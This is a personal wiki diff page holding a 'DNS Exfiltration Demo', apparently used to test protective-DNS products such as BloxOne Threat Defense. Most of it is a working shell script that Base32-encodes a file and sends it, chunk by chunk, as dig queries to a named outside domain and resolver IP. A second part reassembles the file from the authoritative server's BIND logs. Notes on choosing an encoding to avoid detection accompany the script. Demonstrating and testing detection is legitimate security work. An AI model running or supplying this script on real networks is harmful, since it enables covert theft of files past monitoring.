Saucepan

User Tools

Site Tools

Trace: region_codes misc install_gitolite ping
dns:dns_exfiltration

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
dns:dns_exfiltration [2023/05/27 19:18] bstafforddns:dns_exfiltration [2023/11/29 15:02] (current) – [DNS Exfiltration Demo] bstafford
Line 1: Line 1:
 ===== DNS Exfiltration Demo ===== ===== DNS Exfiltration Demo =====
 [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]] [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]]
 +===== Base64 =====
 +Base64. Contains uppercase letters and defaults to allowing = and / etc. This is not recommended as it can make it easier to detect attacks as 'normal' DNS doesn't use these. Use Base32 instead.
  
 +However, Base32 isn't available natively in many scripting toolsets. Base64 is. So some attackers use Base64 to avoid having to write their own Base32 conversion code.
  
-<code>SOURCE=/home/name/dns_exfil_test/releasenotes.pdf+ 
 + 
 + 
 +===== Simple Exfiltration ===== 
 +Note that the BIND logs will be approximately 17 times the size of the transferred file. 
 + 
 +Note that this is actually two scripts as the last few commands are to be run on the DNS auth server to decrypt the logs. 
 +<code># File to be exfiltrated 
 +SOURCE=/home/name/dns_exfil_test/file.pdf 
 + 
 +
 ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt
-ENCRYPTED2=/home/name/dns_exfil_test/encryptedpdf2.txt +ENCRYPTED2=/home/name/dns_exfil_test/decryptedpdf.txt 
-DOMAIN=domain.com+ 
 +# SLD of exfiltration domain 
 +DOMAIN=ferrety-solutions.com 
 + 
 +# sub-domain off SLD that we change for every file
 SUBDOM=asdf SUBDOM=asdf
-LOCALDNS=protectivedns.example.com+ 
 +# Target DNS server (e.g. NIOS with DFP or BloxOne Host) 
 +# Public IP is the BloxOne Threat Defense IP address 
 +#LOCALDNS=192.168.11.154 
 +LOCALDNS=52.119.41.100 
 + 
 +# Log file that the DNS queries can be found in on the authoritative DNS server
 BIND_LOG_FILE=/var/log/named/query.log BIND_LOG_FILE=/var/log/named/query.log
-DECRYPTEDOUTPUT=/home/name/dns_exfil_test/releasenotes2.pdf 
  
 +# File to put the decrypted, received file into (should be a replica of SOURCE)
 +DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf
  
-# Encrypt source file into Base32 and then split into strings of 32 characters each. Then suffix on the domain to query. 
-base32 $SOURCE | tr -d '\n' | fold -32 | sed -e "s/$/.$SUBDOM.$DOMAIN/" > $ENCRYPTED 
  
-Use DIG to iterate over the file and resolve the DNS+Encrypt source file into Base32 
-dig +short A @$LOCALDNS -$ENCRYPTED+# then split into strings of 32 characters each.  
 +# Then suffix on the domain to query. 
 +# Then add the line number to the start of each line (i.e. put a sequence number on each query) 
 +# Then replace the whitespace at the start of each line with nothing (i.e remove it) 
 +# Then replace the TAB between the number and domain with a "." 
 +base32 $SOURCE | tr -d '\n' | fold -62 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g"$ENCRYPTED
  
-OR+# The result is a file that contains a huge list of FQDN's for us to query (exfiltrate) 
 + 
 +# Exfiltrate the file with DIG. 
 +dig +short A @$LOCALDNS -f $ENCRYPTED
  
-for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 1;done 
  
 +# Delay if required.
 +#for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 0.1 ;done
  
  
-# Parse DNS Server logs, extract queries to exfiltration domain+## The following commands get run on the command auth DNS server. 
 +# Parse DNS Server logs 
 +# Then limit the scope just the queries associated with the SUBDOM that we set (i.e. ignore all the other random stuff we get/ignore any other exfiltration tasks running). 
 +# Then extract just the FQDN query itself 
 +# Then strip the ( character 
 +# Then strip the ): character 
 +# Put the output into ENCRYPTED2 (i.e the DNS server's copy of the encrypted file.
 cat $BIND_LOG_FILE | grep $SUBDOM.$DOMAIN | awk -F " " '{print $8}' | sed s/\(//g | sed s/\)://g > $ENCRYPTED2 cat $BIND_LOG_FILE | grep $SUBDOM.$DOMAIN | awk -F " " '{print $8}' | sed s/\(//g | sed s/\)://g > $ENCRYPTED2
  
-# Convert back from Base32 and recreate original file. +Take the ENCRYPTED2 file 
-cat $ENCRYPTED2 | tr -d '\n' | base32 --decode > $DECRYPTEDOUTPUT</code>+# Then stip off the DOMAIN bit of the data. 
 +# Then sort the output as sometimes queries come in on the wrong order. 
 +# remove duplicate queries (BloxOne Threat Defense seems to duplicate stuff a bit). 
 +# Then strip out the new line character to so we just have a bunch of Base32 code. 
 +# Then convert Base32 back to normal file. 
 +Convert back from Base32 and recreate original file. 
 +cat $ENCRYPTED2 | sed "s/.$SUBDOM.$DOMAIN//g" | sort | uniq | tr -d '\n' | base32 --decode > $DECRYPTEDOUTPUT</code>
dns/dns_exfiltration.1685215133.txt.gz · Last modified: by bstafford